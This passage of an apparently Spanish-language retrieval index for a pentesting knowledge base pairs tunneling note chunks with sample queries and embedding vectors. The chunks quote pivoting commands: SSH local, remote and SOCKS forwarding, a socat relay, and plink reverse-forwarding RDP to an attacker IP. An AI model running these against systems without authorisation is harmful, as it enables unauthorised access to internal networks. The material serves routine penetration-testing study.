0.02309, 0.07407, 0.07853, 0.12203, -0.05687, 0.03425, -0.03448, 0.08687, -0.00596, -0.04491, 0.05248, 0.07154, 0.01926, 0.02173, 0.02905, -0.06961, -0.01602, -0.03519, 0.00037, -0.01643, -0.03812, 0.01727, 0.01745, -0.07511, -0.00619, 0.00397, -0.00594, -0.07822, 0.05524, -0.01437, -0.02114, 0.01601, 0.05811, 0.04908, -0.07165, 0.07991, -0.00864, -0.02817, 0.02715, 0.00434]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "con que puedo montar un proxy para acceder a redes internas", "v": [0.04054, 0.05492, -0.2418, -0.11077, 0.0258, 0.09693, -0.0097, 0.06679, -0.17022, -0.12743, 0.02487, -0.01183, 0.07708, -0.13852, 0.02586, 0.07194, 0.02562, 0.0529, 0.11947, -0.02798, -0.02084, -0.03972, -0.08962, -0.10491, 0.04596, 0.04714, 0.0386, -0.02992, -0.10424, -0.1156, -0.09558, -0.01142, 0.08358, 0.07068, -0.03824, -0.08085, 0.03023, 0.19021, 0.05746, -0.01909, 0.05517, -0.03751, -0.09101, 0.0197, 0.09716, 0.00764, -0.05792, -0.14554, -0.03915, -0.01354, -0.01034, -0.11604, -0.19405, 0.01381, -0.14981, -0.06247, 0.07847, -0.13952, -0.03176, 0.002, 0.00584, 0.01375, -0.01535, 0.04141, 0.01249, -0.02357, -0.03965, 0.11523, -0.13061, 0.07245, 0.01779, -0.01568, 0.00446, -0.10466, -0.01171, 0.07897, -0.05416, -0.03012, 0.08068, 0.09418, -0.02644, 0.0166, -0.00578, 0.02233, -0.08504, -0.03391, -0.02698, -0.12002, 0.07913, -0.05116, 0.06986, 0.06412, -0.02074, -0.01174, -0.00702, -0.04342, -0.01579, -0.02694, -0.03018, -0.11385, -0.06666, 0.03026, -0.02523, 0.15282, -0.02016, 0.00192, -0.02209, -0.02311, 0.05548, -0.06166, 0.06771, 0.05868, -0.10045, -0.02216, 0.00208, -0.04488, -0.09518, 0.09005, -0.00402, 0.01591, -0.05463, -0.05289, -0.01758, 0.01393, 0.01419, -0.02946, 0.00704, 0.08475, -0.02002, -0.02767, -0.0079, -0.00378, -0.00146, -0.10834, -0.04348, -0.01359, -0.06247, -0.13666, -0.06179, -0.06564, -0.02275, -0.08123, -0.06886, -0.0705, 0.01304, 0.13588, 0.01877, -0.07894, -0.00995, -0.00827, 0.00494, 0.07671, -0.02541, 0.02423, -0.07287, 0.04191, -0.06212, -0.09494, 0.06682, 0.06159, 0.00671, 0.01456, -0.05912, -0.00973, -0.06073, 0.028, -0.11814, -0.03448, 0.06531, 0.01498, -0.10167, 0.10491, -0.02208, -0.08853, 0.00315, 0.04271, -0.08381, -0.03778, 0.02747, 0.02265, -0.02169, -0.07568, -0.00657, -0.03893, -0.0479, -0.00816, 0.04879, 0.04709, -0.0305, 0.08649, -0.05832, 0.00227, 0.00727, 0.09181, 0.09756, -0.0741, -0.02398, 0.00797, 0.02942, -0.02577, -0.01416, -0.03143, -0.00119, -0.00706, -0.00209, -0.05301, 0.00241, 0.00367, 0.0444, 0.07764, 0.05026, -0.05458, -0.00714, -0.02956, -0.02827, 0.01755, 0.05793, -0.04795, -0.05047, 0.03863, 0.00134, 0.04676, 0.06101, 0.01868, 0.01834, 0.04058, -0.03694, -0.03925, 0.00756, -0.00464, 0.03688, -0.0373, -0.04303, -0.01845, 0.00333, -0.02025, 0.00823, -0.00029, -0.00279, 0.03317, -0.00936, 0.02746, -0.00054, 0.03345, -0.01803, -0.04881, -0.07721, 0.03359, 0.00137, -0.06222, -0.03113, -0.00024, -0.01649, -0.01059, 0.03476, -0.03966]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "indexar": "cual es una alternativa libre a ligolo-ng", "v": [-0.05861, 0.02468, -0.04571, 0.16693, -0.05255, -0.06089, -0.06468, -0.05817, -0.22221, -0.07731, 0.00397, -0.25211, -0.03779, 0.03483, 0.16633, -0.09278, 0.05983, -0.08255, 0.04578, -0.10825, -0.13017, 0.07782, -0.08523, -0.10019, 0.07473, -0.09026, 0.09785, -0.04849, -0.06401, 0.06546, -0.07393, -0.01874, 0.08273, -0.03735, 0.08623, 0.09779, 0.22416, 0.11722, 0.09591, -0.00469, 0.0793, -0.08364, -0.04122, 0.02546, -0.02757, -0.15287, -0.03298, 0.05055, 0.02733, 0.11133, 0.01568, 0.06176, -0.02091, -0.04491, 0.07313, 0.00852, 0.10713, -0.09376, -0.03019, -0.01058, -0.06168, -0.00654, 0.0876, -0.02984, 0.00014, 0.06027, -0.0929, 0.06717, -0.02951, 0.02467, 0.04091, 0.02949, 0.02453, 0.01423, -0.1406, 0.11922, -0.03706, -0.05439, -0.0137, 0.02368, 0.04204, -0.04914, 0.04004, 0.05332, -0.04277, -0.05564, 0.0757, -0.04623, 0.03195, 0.09679, 0.06447, 0.01715, 0.00194, 0.13, -0.00893, -0.07596, -0.00342, 0.0819, 0.03055, 0.06036, 0.03692, 0.06189, -0.14422, -0.04862, 0.05607, -0.03234, -0.05579, 0.04296, -0.09637, 0.04194, 0.01229, 0.02747, 0.00234, 0.03552, 0.067, -0.00742, -0.04833, 0.03002, 0.01952, -0.00049, -0.03695, -0.02382, 0.01862, -0.09038, 0.04648, 0.02316, 0.05869, 0.02542, -0.07391, 0.08563, 0.07122, -0.04954, -0.13889, -0.10642, -0.12786, -0.06643, 0.11778, -0.01326, 0.01945, 0.02632, -0.00528, 0.01803, 0.00512, -0.02027, 0.02689, -0.00938, -0.03606, -0.0387, -0.01957, -0.04417, -0.08537, 0.03308, -0.02635, 0.12947, -0.06914, 0.02371, -0.04256, 0.0139, -0.07416, 0.10936, 0.05282, -0.06642, -0.00242, -0.00872, 0.01263, -0.00312, 0.00375, -0.09738, -0.05242, -0.02135, -0.03453, 0.02814, 0.03286, -0.06199, 0.0078, -0.08028, 0.01424, -0.05707, -0.03028, -0.03995, 0.02098, 0.03396, -0.10742, -0.00402, -0.02056, -0.03883, -0.01364, 0.03063, 0.01417, 0.02416, -0.06415, 0.00407, -0.06148, -0.0447, -0.01775, 0.00439, 0.02907, -0.0934, -0.05397, -0.00412, -0.06004, -0.0093, -0.01225, -0.00655, -0.04591, -0.01778, -0.03122, 0.03313, -0.0003, 0.05728, 0.0781, 0.00024, 0.05255, 0.03251, -0.02673, -0.00835, -0.01911, -0.05143, -0.01527, -0.02609, 0.04701, -0.00671, 0.0499, -0.01408, -0.0372, 0.01459, 0.0151, 0.06197, -0.0435, -0.00454, 0.01235, -0.00694, 0.01431, 0.01592, -0.00743, 0.00041, 0.01526, 0.01865, 0.02179, -0.00362, 0.04864, 0.04552, -0.01668, -0.02036, -0.03694, 0.02305, -0.06812, 0.0005, -0.03246, -0.02056, 0.00061, 0.05099, 0.01975, -0.00947, 0.03246, 0.0263]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "que comando de ssh sirve para conectar como proxy local", "v": [0.06409, -0.00686, -0.23179, -0.11936, 0.02973, -0.21919, -0.00673, -0.09852, 0.02691, 0.0431, -0.13933, 0.01351, 0.08454, -0.19457, -0.01782, 0.02989, 0.10458, -0.02691, -0.023, 0.03234, 0.00975, 0.06463, 0.01108, -0.00758, 0.04919, 0.01319, 0.14561, 0.00423, -0.13826, -0.09422, -0.01382, -0.01184, 0.05152, 0.07211, 0.01267, 0.01898, -0.05975, 0.11798, 0.03114, 0.14721, -0.01629, -0.07646, -0.14566, 0.05987, 0.09028, -0.08767, 0.03164, -0.09303, 0.06544, 0.02074, -0.12498, -0.06627, -0.1869, 0.02556, -0.04923, 0.05902, 0.04015, -0.18857, 0.00175, -0.00714, -0.17479, -0.10919, -0.01474, 0.01452, 0.03717, -0.04015, -0.08976, -0.06957, -0.10979, 0.04183, -0.08989, 0.0631, -0.03184, 0.00883, 0.00191, 0.0363, -0.0006, 0.00972, 0.12983, -0.01424, 0.02142, -0.00491, -0.01899, -0.00229, -0.12718, -0.04972, -0.06211, -0.08204, 0.10779, 0.00362, 0.01902, 0.03147, 0.0546, 0.00985, 0.08375, -0.00589, 0.02143, -0.01918, 0.05605, -0.04094, 0.0679, -0.02851, -0.07531, 0.18214, 0.05367, -0.02908, 0.06323, -0.01491, 0.00834, 0.0613, 0.07444, -0.06728, 0.08563, -0.04139, -0.02251, -0.09724, -0.0293, -0.02611, -0.00248, 0.04098, -0.11148, -0.06598, -0.0093, 0.0879, -0.04758, 0.01733, -0.04577, 0.02463, 0.06242, 0.08731, 0.0314, -0.01187, 0.07136, -0.11246, -0.04267, 0.11368, 0.06908, -0.07663, -0.09126, -0.1208, 0.00819, 0.07096, -0.01458, -0.02429, 0.03605, 0.02973, 0.03228, -0.01082, -0.01624, 0.01207, -0.00783, 0.04925, -0.10496, 0.04997, -0.03948, 0.04839, -0.00166, -0.03964, 0.02025, 0.04135, -0.01666, -0.06199, -0.02103, 0.07212, -0.00752, -0.02937, -0.09024, -0.03628, 0.07503, 0.03253, -0.01896, 0.06572, -0.02231, -0.06957, -0.03788, -0.06419, -0.00486, -0.06533, 0.02706, 0.03082, 0.01515, 0.01984, 0.00035, -0.00796, -0.00777, 0.03449, 0.001, -0.03049, 0.02855, 0.06621, -0.0239, 0.0089, -0.04551, -0.0009, 0.00239, -0.07651, 0.01708, -0.06397, 0.00569, 0.00426, -0.04195, 0.03397, -0.01922, 0.00794, 0.03733, 0.00224, -0.01771, 0.03703, 0.01754, 0.03603, 0.0148, -0.02456, 0.05449, 0.01671, -0.01684, -0.02939, 0.01053, -0.07718, -0.03053, 0.05502, -0.02912, 0.0092, 0.00799, 0.00175, 0.02727, -0.01315, -0.02375, -0.02813, 0.06754, 0.01997, -0.03789, 0.002, -0.02844, -0.00857, 0.01421, -0.01141, 0.00748, -0.00564, 0.01426, -0.03294, -0.0068, 0.0453, -0.03293, -0.05307, -0.04511, -0.0581, -0.09263, 0.02716, 0.0279, -0.0352, -0.03285, -0.00623, -0.00027, 0.01227, -0.01947, 0.00288]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "cual es una tecnica con ssh para exponer un servicio remoto en mi ordenador", "v": [0.13129, -0.0919, -0.12577, -0.15049, 0.02403, -0.19382, -0.11509, -0.10669, 0.06767, 0.05419, -0.22321, 0.0067, 0.06246, -0.09079, 0.11563, -0.02899, 0.12444, -0.04599, 0.07514, 0.13455, -0.00173, 0.0619, -0.0515, 0.02812, 0.02652, -0.03776, 0.01116, 0.05744, -0.11359, -0.01132, 0.03557, 0.00173, 0.03026, -0.02635, 0.01514, -0.00217, 0.00536, 0.07813, 0.0931, 0.06549, 0.03498, -0.08448, -0.0448, 0.03173, 0.19462, -0.09877, 0.04727, -0.02931, 0.05087, 0.03422, -0.06109, -0.03476, -0.13743, -0.04718, -0.04044, -0.0445, 0.17367, -0.10578, 0.06157, -0.02446, -0.0885, 0.03956, -0.03978, 0.0045, 0.03414, -0.09193, -0.11984, -0.02354, -0.11306, 0.04998, -0.11264, 0.03396, 0.01217, -0.03201, -0.05613, 0.04759, -0.08074, -0.03263, 0.10301, -0.04025, -0.04321, -0.03002, -0.07254, -0.01307, -0.17082, -0.12246, 0.03735, -0.04921, 0.02896, -0.03027, 0.04183, 0.09707, -0.04343, 0.01177, 0.06758, 0.01448, 0.08921, 0.03987, -0.09159, -0.07655, 0.05696, 0.05282, -0.08558, 0.17943, -0.07256, -0.00439, 0.07907, -0.07309, -0.02918, -0.06527, 0.0677, 0.00586, 0.0274, -0.03633, -0.12006, -0.09545, 0.00218, -0.09614, -0.0626, 0.02945, -0.02213, -0.01889, 0.0809, 0.06173, 0.02539, -0.02693, -0.03126, 0.05049, -0.03794, -0.03563, 0.0401, -0.00853, -0.001, -0.06716, 0.03494, 0.0707, 0.023, -0.12247, -0.01067, -0.09147, 0.04084, 0.08275, -0.00313, -0.04032, 0.03917, 0.03537, 0.05303, -0.06225, -0.09653, -0.0252, 0.02698, 0.01216, 0.01272, 0.07159, -0.05918, 0.03605, -0.00408, -0.03912, -0.08067, 0.05239, -0.00966, 0.00887, 0.07358, -0.00083, -0.00826, 0.00377, -0.04873, -0.06725, 0.03171, 0.00702, -0.08378, 0.04895, -0.05551, -0.05832, 0.01178, -0.03448, -0.05183, -0.02229, -0.03712, -0.00689, -0.02167, 0.01926, 0.03314, 0.03303, 0.009, 0.04742, 0.00255, -0.02933, 0.02609, -0.03505, -0.0099, -0.02196, -0.05141, 0.02876, 0.03887, -0.04727, -0.05185, -0.05353, 0.0529, 0.00234, -0.09849, -0.00705, -0.0375, -0.01057, 0.0323, 0.04405, 0.00218, -0.00345, -0.06248, 0.02896, -0.00335, -0.00847, 0.05149, -0.03481, -0.0459, -0.0239, 0.01115, -0.06751, 0.01832, -0.00139, 0.04025, -0.04093, 0.02509, -0.01097, -0.00191, -0.00985, 0.04146, 0.03317, 0.01279, -0.06279, -0.00624, -0.00846, 0.01675, 0.00624, 0.00373, -0.02367, 0.04469, -0.06976, 0.00201, -0.00923, 0.0174, 0.0672, -0.00262, -0.05777, -0.04987, 0.00403, -0.1423, 0.00804, -0.04673, -0.05549, -0.03578, -0.03434, 0.00756, -0.03624, 0.00276, 0.0034]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## SSH (el mΓ‘s portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 β†’ servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "indexar": "con que comando de ssh puedo usar el proxy socks", "v": [0.09782, -0.06041, -0.21062, -0.0648, -0.06179, -0.20383, -0.02075, -0.18698, 0.04447, 0.07203, -0.20618, 0.03933, 0.07511, -0.17423, -0.08047, -0.02159, 0.14603, -0.00682, -0.06469, 0.06487, 0.02218, -0.01593, -0.02843, -0.05781, 0.06133, 0.03676, 0.1154, 0.05798, -0.09447, -0.09945, -0.10499, 0.04879, 0.06636, 0.0531, -0.04393, 0.02039, -0.08394, 0.05124, 0.08575, 0.15873, -0.03416, -0.08038, -0.15692, -0.00379, 0.03116, -0.05906, 0.01739, -0.0662, 0.04313, -0.00707, -0.04427, -0.09594, -0.20359, 0.09741, -0.08763, 0.03316, 0.09057, -0.11396, -0.01379, 0.00129, -0.14524, -0.05316, 0.055, 0.05669, 0.00588, -0.06354, -0.11535, -0.0781, -0.09524, 0.03187, -0.07671, 0.05916, -0.07222, 0.01239, 0.02176, 0.02017, -0.02172, -0.01904, 0.09132, -0.01542, -0.07222, 0.02365, -0.02597, 0.00999, -0.13455, -0.1073, -0.05042, -0.08013, 0.10274, -0.01831, -0.06688, 0.08528, 0.05244, -0.08574, 0.07028, 0.03172, 0.03988, -0.0245, 0.0351, -0.05454, 0.02756, 0.00489, -0.03144, 0.15196, -4e-05, -0.01736, 0.01682, -0.05236, 0.01374, 0.02095, 0.03279, -0.07882, 0.03481, -0.05849, 0.01714, -0.0226, -0.06, -0.071, 0.01025, -0.00312, -0.07134, -0.07626, -0.04685, 0.03953, 0.06193, -0.04866, -0.0242, 0.02728, 0.00203, 0.05946, 0.0266, -0.01437, 0.00192, -0.10809, -0.05809, 0.15725, 0.03385, -0.00815, -0.02512, -0.13241, 0.00887, 0.06578, -0.02845, 0.01476, 0.02467, 0.032, -0.01585, -0.01194, -0.00924, -0.05958, 0.03456, 0.04218, -0.04666, 0.06684, -0.03071, 0.05044, 0.005, -0.0632, -0.00276, 0.03205, -0.05524, -0.06844, -0.08034, 0.08425, 0.03617, -0.04233, 0.0018, -0.0487, -0.0312, 0.04129, 0.00133, 0.08303, -0.01822, -0.05342, -0.00235, -0.07364, -0.01753, -0.04263, -0.01163, 0.04114, 0.05751, -0.00489, 0.01321, -0.00953, 0.01268, 0.00345, -0.01118, -0.008, 0.02818, 0.08255, -0.00784, 0.08411, 0.01382, 0.01693, -0.00148, -0.04228, 0.05264, -0.04516, -0.0386, -0.03763, -0.02697, 0.06264, -0.01102, -0.04321, 0.05909, -0.06442, -0.0632, 0.0263, 0.04337, 0.02349, 0.01648, -0.05666, 0.04605, 0.01348, -0.02346, -0.01997, 0.00803, -0.00207, -0.03299, -0.01192, -0.01291, 0.05505, 0.01366, -0.00208, 0.06053, -0.00751, -0.03297, -0.01923, 0.03687, -0.0045, -0.04041, 0.00533, -0.01075, -0.03275, -0.0066, -0.0222, 0.018, -0.00549, 0.02212, -0.0032, -0.04521, 0.0503, -0.01931, -0.04235, -0.0335, -0.02459, -0.07988, 0.04945, -0.00303, -0.02965, -0.01619, 0.00745, -0.02187, -0.03877, -0.03498, 0.00344]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## socat (redirecciΓ³n simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "indexar": "quΓ© programa puedo usar para redirigir el puerto 80 a otra IP", "v": [-0.16483, -0.03094, -0.16934, -0.06604, 0.129, -0.07586, 0.11858, -0.14004, -0.2203, -0.07026, 0.02513, -0.0148, 0.03439, -0.11249, -0.06211, -0.05171, -0.00777, 0.04654, 0.09546, -0.11464, -0.06762, 0.11876, -0.03833, -0.10668, 0.00192, 0.08675, -0.02114, 0.05641, -0.02699, -0.11066, -0.11744, -0.01431, 0.07754, -0.16321, -0.15001, -0.14345, 0.04816, 0.06943, 0.10271, 0.05819, 0.05288, 0.03054, -0.03349, -0.06749, 0.1637, 0.04919, 0.07039, -0.08027, 0.03678, -0.09546, -0.06814, -0.03675, 0.02657, 0.03868, -0.00586, 0.01058, 0.02035, -0.08217, -0.05569, -0.00986, 0.00829, 0.07157, -0.06609, -0.06915, 0.06377, -0.08697, -0.07612, 0.07039, -0.12756, -0.00807, -0.03708, -0.01803, 0.01475, 0.07546, 0.03622, 0.00541, -0.04807, -0.0162, 0.06317, -0.0442, -0.01477, 0.05712, -0.03234, -0.05866, -0.08144, -0.05405, 0.02586, -0.16767, 0.02821, -0.10346, -0.00375, 0.00325, 0.00917, 0.11152, 0.04086, -0.04076, 0.06508, 0.12797, -0.04159, 0.00717, 0.07015, 0.04337, -0.09067, 0.03145, 0.02877, 0.06773, 0.01869, -0.06288, 0.0208, 0.00147, -0.00219, 0.00236, -0.05042, -0.07537, -0.06532, 0.02235, -0.05613, -0.09524, 0.05412, -0.0588, -0.05211, -0.03654, -0.00518, -0.0024, 0.08008, 0.0001, 0.04074, 0.17882, -0.04946, 0.01246, 0.037, -0.02644, -0.05481, -0.05366, 0.02374, -0.02404, 0.00154, -0.02485, -0.05896, 0.04563, -0.01055, 0.0728, -0.02409, -0.00133, 0.06294, -0.03525, 0.00019, -0.05998, -0.00276, -0.03461, 0.02682, 0.05349, 0.00607, 0.07289, -0.06907, 0.0043, 0.08992, -0.02892, -0.04769, -0.02947, -0.07605, -0.03064, -0.03674, -0.03807, 0.10757, -0.02686, -0.08442, -0.00111, 0.0843, 0.04456, -0.03366, 0.08479, -0.03689, -0.0893, 0.02666, -0.06822, -0.06104, -0.05656, -0.03014, -0.06863, -0.05979, 0.01834, 0.00629, -0.03877, 0.01009, -0.00545, -0.06534, 0.05804, 0.03612, 0.04074, -0.01149, 0.00856, -0.01476, -0.00642, -0.01476, 0.03404, -0.03529, -0.06273, -0.00641, -0.03835, -0.03139, 0.0452, 0.00104, -0.0409, 0.04401, 0.08799, -0.09011, -0.00551, 0.0291, 0.08955, 0.01551, -0.09635, 0.07008, -0.00693, -0.05535, 0.01104, -0.00886, 0.07709, 0.05409, 0.04794, 0.00949, 0.02497, -0.03564, 0.10046, 0.00446, -0.04313, -0.01865, 0.02047, 0.05199, 0.02417, -0.04368, -0.00289, -0.05103, -0.05551, 0.00898, -0.02556, -0.03317, 0.00374, -0.02754, -0.08476, -0.00015, 0.03165, -0.02445, -0.00175, 0.01412, -0.00666, -0.06888, 0.05015, -0.05382, -0.02025, -0.00599, 0.00588, 0.02745, -0.04014, -0.01216, 0.0273]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## socat (redirecciΓ³n simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "indexar": "con quΓ© herramienta puedo escuchar en un puerto especΓ­fico y reenviar la conexiΓ³n", "v": [-0.07785, 0.15572, -0.22768, -0.16329, 0.02074, -0.03821, -0.06084, -0.07713, 0.01316, -0.16087, -0.08114, 0.0534, 0.0172, -0.04426, 0.06221, 0.06708, 0.03044, 0.09708, 0.02313, -0.02004, -0.03807, -0.01935, -0.13064, 0.04935, 0.00626, 0.0334, 0.16477, 0.05172, -0.08781, 0.0434, -0.01414, 0.08207, 0.0409, 0.00576, -0.14982, -0.0656, 0.05658, 0.19836, 0.03699, 0.05316, -0.02763, 0.01813, -0.11948, 0.06807, 0.1366, -0.00747, -0.01517, 0.02191, 1e-05, 0.14511, -0.05725, 0.00013, -0.12428, -0.01863, -0.03249, -0.08501, 0.09748, -0.10636, 0.09108, -0.14663, -0.13611, -0.0154, -0.05724, -0.10422, 0.06736, 0.00645, 0.00095, 0.01321, -0.09436, 0.08319, -0.07827, -0.04356, 0.10474, 0.06219, 0.07517, 9e-05, 0.05152, 0.02013, 0.04365, 0.06885, 0.05494, -0.04174, -0.00649, -0.04196, -0.05612, 0.06402, 0.07624, -0.03213, 0.02397, -0.07209, -0.05962, 0.01215, -0.05317, 0.01141, -0.0026, 0.01871, -0.02689, -0.04648, -0.0697, -0.06937, 0.15519, 0.02733, -0.05953, 0.02931, 0.03511, 0.01464, -0.02834, -0.06438, 0.00907, 0.00202, 0.0435, -0.00695, 0.05346, -0.09195, -0.02581, -0.0365, -0.02488, -0.11013, 0.02601, 0.00783, 0.02579, -0.02207, -0.0566, -0.01956, -0.04523, -0.0348, 0.01102, 0.10446, 0.05335, -0.02866, -0.00609, -0.02556, -0.03517, -0.11194, 0.02603, -0.07935, -0.04718, -0.12651, -0.022, -0.01666, 0.01297, 0.00641, -0.06167, -0.028, 0.02299, -0.00072, 0.00053, -0.05757, -0.05968, -0.03394, 0.00967, 0.0113, -0.03641, -0.01843, -0.06753, 0.03252, 0.06607, 0.00088, -0.02298, 0.05248, -0.07758, -0.03611, -0.05441, -0.05806, 0.08181, -0.03993, -0.06565, 0.01649, 0.0915, 0.00546, -0.05719, -0.00235, 0.04313, -0.02261, -0.08783, -0.04975, -0.08702, 0.01039, 0.01419, -0.08615, -0.11992, -0.001, -0.0431, -0.11143, 0.00247, -0.07306, -0.0218, -0.09746, -0.01805, 0.08238, -0.03643, -0.00838, 0.01408, -0.00766, 0.04775, 0.00335, -0.0171, -0.00768, -0.06572, 0.0644, -0.01115, -0.01602, 0.03426, -0.08167, 0.09627, 0.09587, -0.06865, -0.00172, -0.00153, 0.07398, 0.02181, -0.01403, 0.04887, 0.01709, -0.01507, -0.00908, 0.01935, 0.02543, -0.01183, 0.08415, 0.01368, 0.08998, 0.10209, 0.02126, -0.01316, 0.00961, 0.03165, 0.02753, 0.01801, 0.02303, -0.01657, -0.00771, -0.01509, -0.00179, -0.01251, -0.00033, -0.01687, -0.00109, -0.09529, 0.00886, 0.04851, 0.06915, 0.00924, -0.04718, 0.01928, -0.04289, -0.03074, 0.04959, -0.02531, -0.04936, -0.0574, 0.06175, 0.06257, -0.06151, 0.04528, -0.01011]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "indexar": "ΒΏQuΓ© programa puedo usar en Windows para acceder remotamente a servidores Linux?", "v": [-0.12236, 0.04109, -0.10802, -0.20777, 0.04241, -0.09744, -0.09197, -0.07027, -0.08351, -0.0589, -0.08268, -0.12291, 0.0433, -0.08429, 0.00122, -0.02927, 0.02621, -0.06691, 0.02177, -0.02711, -0.00382, 0.04432, -0.07, 0.035, -0.01808, 0.03441, 0.15546, -0.14077, 0.03343, -0.03409, -0.03025, -0.02661, 0.03322, -0.00213, -0.03813, 0.06714, 0.01267, 0.11257, 0.10803, 0.11982, 0.15488, 0.04552, -0.04022, 0.01125, 0.04383, -0.11105, 0.09759, -0.0965, 0.06116, -0.08676, -0.05181, -0.0197, -0.04266, -0.05647, 0.04646, -0.01445, 0.13048, -0.13799, 0.00852, 0.05344, -0.13199, 0.07304, -0.05024, -0.02162, 0.0038, -0.06641, 0.00663, -0.04467, -0.12111, 0.08123, -0.08964, 0.0563, 0.0285, -0.05109, -0.00186, 0.09479, -0.16114, -0.06524, 0.11827, -0.02962, 0.01342, 0.05922, 0.04324, 0.00903, -0.13649, -0.22128, 0.03079, 0.01461, -0.02791, -0.01989, 0.05996, 0.04079, -0.019, 0.1404, 0.0803, -0.03734, 0.0965, 0.00988, -0.01414, 0.01357, -0.01479, -0.01101, -0.0389, 0.13362, -0.08711, 0.07227, 0.08318, -0.08815, -0.03999, -0.06465, 0.05109, -0.02515, -0.09724, 0.00316, -0.10555, -0.03488, -0.02974, -0.05938, 0.01963, 0.03167, -0.09235, 0.03624, -0.01966, 0.02032, 0.08292, -0.05432, 0.00555, 0.14416, -0.10696, -0.03124, 0.06149, -0.06199, -0.04583, -0.01994, -0.07883, 0.00475, 0.05264, -0.10238, 0.00802, -0.03698, 0.0539, 0.0676, 0.01071, 0.03678, 0.08997, -0.02732, 0.07892, -0.03745, -0.03128, -0.04746, 0.01933, -0.04541, -0.04013, 0.00361, -0.11309, -0.04694, 0.0346, 0.00979, -0.0922, -0.01987, -0.03272, -0.02133, -0.00141, -0.00607, 0.00602, -0.01986, -0.00043, 0.05153, 0.03835, 0.05257, -0.04398, 0.10115, -0.00363, -0.0631, 0.00267, -0.05851, 0.01711, -0.06296, -0.00323, 0.01845, -0.06279, 0.05985, 0.02418, -0.04069, 0.00892, 0.02808, -0.05024, 0.0412, -0.03466, 0.02093, -0.01755, -0.00297, 0.01943, -0.02406, 0.01072, -0.00242, -0.07595, -0.00133, 0.0093, -0.01643, -0.05885, -0.00726, -0.02695, -0.035, 0.09819, 0.03469, -0.06082, 0.03642, 0.02428, 0.08609, -0.01327, -0.00699, 0.07374, -0.02079, -0.01673, -0.03605, 0.04504, 0.00849, 0.03633, -0.01015, -0.0005, 0.01964, 0.05912, 0.03224, 0.02156, -0.03567, 0.01062, -0.0009, 0.00477, -0.01403, 0.02601, 0.01211, 0.00206, -0.00277, -0.03564, -0.04096, 0.00889, -0.02462, -0.00431, -0.03999, -0.05887, 0.1329, -0.00832, -0.07112, -0.07263, -0.05801, -0.06377, -0.00055, -0.0525, -0.03034, -0.02028, -0.02094, 0.03468, -0.02509, -0.03317, 0.07647]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "indexar": "ΒΏCon quΓ© herramienta puedo ejecutar comandos SSH desde mi ordenador sin instalar un cliente?", "v": [0.04509, 0.10617, -0.11601, -0.14128, 0.05136, -0.22159, -0.05055, -0.08371, -0.13632, -0.01324, -0.19053, 0.00604, 0.03044, -0.15152, 0.05425, 0.04921, 0.14061, -0.1179, -0.02446, 0.02889, 0.08538, -0.05753, -0.04157, -0.0066, -0.04679, 0.0736, 0.06255, 0.03374, -0.16826, -0.05431, -0.01181, -0.00693, 0.08342, -0.05502, -0.04283, -0.03362, -0.08666, 0.00461, 0.0575, 0.08961, 0.05247, 0.0527, -0.05476, 0.06321, 0.11708, -0.06418, 0.06903, -0.07069, 0.05491, 0.02011, -0.00809, -0.1211, -0.1538, -0.06046, -0.02189, -0.10649, 0.22782, -0.12746, 0.11215, -0.07192, -0.07046, 0.05697, 0.00084, 0.14124, 0.05784, 